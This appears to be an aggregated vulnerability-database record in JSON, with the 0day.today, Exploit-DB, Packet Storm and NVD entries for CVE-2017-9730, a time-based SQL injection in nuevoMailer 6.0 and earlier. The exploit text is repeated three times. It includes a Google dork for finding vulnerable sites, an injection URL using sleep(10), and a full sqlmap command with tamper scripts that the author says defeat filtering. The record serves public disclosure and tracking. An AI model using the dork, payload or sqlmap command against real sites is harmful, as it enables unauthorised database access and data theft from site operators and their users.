{"sourceData": "# Exploit Title: nuevoMailer version 6.0 and earlier time-based SQL Injection\r\n# Exploit Author: ALEH BOITSAU\r\n# Google Dork: inurl:/inc/rdr.php?\r\n# Date: 2017-06-09\r\n# Vendor Homepage: https://www.nuevomailer.com/\r\n# Version: 6.0 and earlier\r\n# Tested on: Linux\r\n# CVE: CVE-2017-9730\r\n \r\nDescription: SQL injection vulnerability in rdr.php in nuevoMailer version 6.0 and earlier \r\nallows remote attackers to execute arbitrary SQL commands via the \"r\" parameter. \r\n \r\nPoC:\r\n \r\nhttps://vulnerable_site.com/inc/rdr.php?r=69387c602c1056c556[time based SQL INJ]\r\n \r\nhttps://vulnerable_site.com/inc/rdr.php?r=69387c602c1056c556%20and%20sleep(10)--+\r\n \r\nsqlmap -u \"http://vulnerable_site.com/inc/rdr.php?r=120c44c5\" --dbms=mysql -p r --tamper=equaltolike,between --hostname --technique=T -v 3 --random-agent --time-sec=4\r\n \r\nNB: \"equaltolike\" and \"between\" arsenal to defeat filtering! Data retrieval process may take more than usual time.\r\n \r\nDisclosure Timeline:\r\n2017-06-09: Vendor has been notified\r\n2017-06-09: Vendor responded with intention to fix the vulnerability\r\n2017-06-16: CVE number acquired\r\n2017-06-16: Public disclosure\n\n# 0day.today [2018-04-09] #", "history": [], "description": "Exploit for php platform in category web applications", "sourceHref": "https://0day.today/exploit/27972", "reporter": "Oleg Boytsev", "href": "https://0day.today/exploit/description/27972", "type": "zdt", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "a7dd4fb4e8d8b7deff048c83aae42251"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc"}, {"key": "href", "hash": "57e9480601c397ab954082230b9c2fe0"}, {"key": "modified", "hash": "4810b7c74b546212105db05ba6aca7b1"}, {"key": "published", "hash": "4810b7c74b546212105db05ba6aca7b1"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "868e6228dfe416d34802055a3c72872a"}, {"key": "sourceData", "hash": "2f81d14e33513996069e62012a3399bb"}, {"key": "sourceHref", "hash": "f532f8d5572693e9ce61c190b1a24043"}, {"key": "title", "hash": "d483959410d022a451f186c76c8961c2"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "viewCount": 0, "references": [], "lastseen": "2018-04-10T00:23:28", "published": "2017-06-19T00:00:00", "objectVersion": "1.3", "cvelist": ["CVE-2017-9730"], "id": "1337DAY-ID-27972", "hash": "c438f54c0c8e3e3f952d18b3a015ef874226a84ed6e0fb15286abc27c3f3bcff", "modified": "2017-06-19T00:00:00", "title": "nuevoMailer 6.0 - SQL Injection Vulnerability", "edition": 1, "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "bulletinFamily": "exploit", "enchantments": {"score": {"vector": "NONE", "value": 7.5}, "vulnersScore": 7.5}}

{"cve": [{"lastseen": "2017-06-24T10:36:49", "references": ["https://www.exploit-db.com/exploits/42193/"], "description": "SQL injection vulnerability in rdr.php in nuevoMailer version 6.0 and earlier allows remote attackers to execute arbitrary SQL commands via the \"r\" parameter.", "edition": 2, "reporter": "NVD", "published": "2017-06-19T08:29:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "CVE-2017-9730", "type": "cve", "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2017-9730"], "scanner": [], "cpe": ["cpe:/a:nuevomailer:nuevomailer:6.0"], "modified": "2017-06-23T10:36:22", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-9730", "id": "CVE-2017-9730", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2017-06-19T12:14:48", "osvdbidlist": [], "references": [], "description": "nuevoMailer 6.0 - SQL Injection. CVE-2017-9730. Webapps exploit for PHP platform", "edition": 1, "reporter": "Exploit-DB", "published": "2017-06-09T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "nuevoMailer 6.0 - SQL Injection", "type": "exploitdb", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-9730"], "modified": "2017-06-09T00:00:00", "href": "https://www.exploit-db.com/exploits/42193/", "id": "EDB-ID:42193", "sourceData": "# Exploit Title: nuevoMailer version 6.0 and earlier time-based SQL Injection\r\n# Exploit Author: ALEH BOITSAU\r\n# Google Dork: inurl:/inc/rdr.php?\r\n# Date: 2017-06-09\r\n# Vendor Homepage: https://www.nuevomailer.com/\r\n# Version: 6.0 and earlier\r\n# Tested on: Linux\r\n# CVE: CVE-2017-9730\r\n\r\nDescription: SQL injection vulnerability in rdr.php in nuevoMailer version 6.0 and earlier \r\nallows remote attackers to execute arbitrary SQL commands via the \"r\" parameter. \r\n\r\nPoC:\r\n\r\nhttps://vulnerable_site.com/inc/rdr.php?r=69387c602c1056c556[time based SQL INJ]\r\n\r\nhttps://vulnerable_site.com/inc/rdr.php?r=69387c602c1056c556%20and%20sleep(10)--+\r\n\r\nsqlmap -u \"http://vulnerable_site.com/inc/rdr.php?r=120c44c5\" --dbms=mysql -p r --tamper=equaltolike,between\u00c2\u00a0 --hostname --technique=T -v 3 --random-agent --time-sec=4\r\n\r\nNB: \"equaltolike\" and \"between\" arsenal to defeat filtering! Data retrieval process may take more than usual time.\r\n\r\nDisclosure Timeline:\r\n2017-06-09: Vendor has been notified\r\n2017-06-09: Vendor responded with intention to fix the vulnerability\r\n2017-06-16: CVE number acquired\r\n2017-06-16: Public disclosure", "sourceHref": "https://www.exploit-db.com/download/42193/", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2017-06-19T20:21:18", "references": [], "description": "", "edition": 1, "reporter": "Aleh Boitsau", "published": "2017-06-16T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "nuevoMailer 6.0 SQL Injection", "type": "packetstorm", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-9730"], "modified": "2017-06-16T00:00:00", "href": "https://packetstormsecurity.com/files/142979/nuevoMailer-6.0-SQL-Injection.html", "id": "PACKETSTORM:142979", "sourceData": "`# Exploit Title: nuevoMailer version 6.0 and earlier time-based SQL Injection \n# Exploit Author: ALEH BOITSAU \n# Google Dork: inurl:/inc/rdr.php? \n# Date: 2017-06-09 \n# Vendor Homepage: https://www.nuevomailer.com/ \n# Version: 6.0 and earlier \n# Tested on: Linux \n# CVE: CVE-2017-9730 \n \nDescription: SQL injection vulnerability in rdr.php in nuevoMailer version 6.0 and earlier \nallows remote attackers to execute arbitrary SQL commands via the \"r\" parameter. \n \nPoC: \n \nhttps://vulnerable_site.com/inc/rdr.php?r=69387c602c1056c556[time based SQL INJ] \n \nhttps://vulnerable_site.com/inc/rdr.php?r=69387c602c1056c556%20and%20sleep(10)--+ \n \nsqlmap -u \"http://vulnerable_site.com/inc/rdr.php?r=120c44c5\" --dbms=mysql -p r --tamper=equaltolike,between --hostname --technique=T -v 3 --random-agent --time-sec=4 \n \nNB: \"equaltolike\" and \"between\" arsenal to defeat filtering! Data retrieval process may take more than usual time. \n \nDisclosure Timeline: \n2017-06-09: Vendor has been notified \n2017-06-09: Vendor responded with intention to fix the vulnerability \n2017-06-16: CVE number acquired \n2017-06-16: Public disclosure \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/142979/nuevomailer6-sql.txt", "cvss": {"score": 0.0, "vector": "NONE"}}]}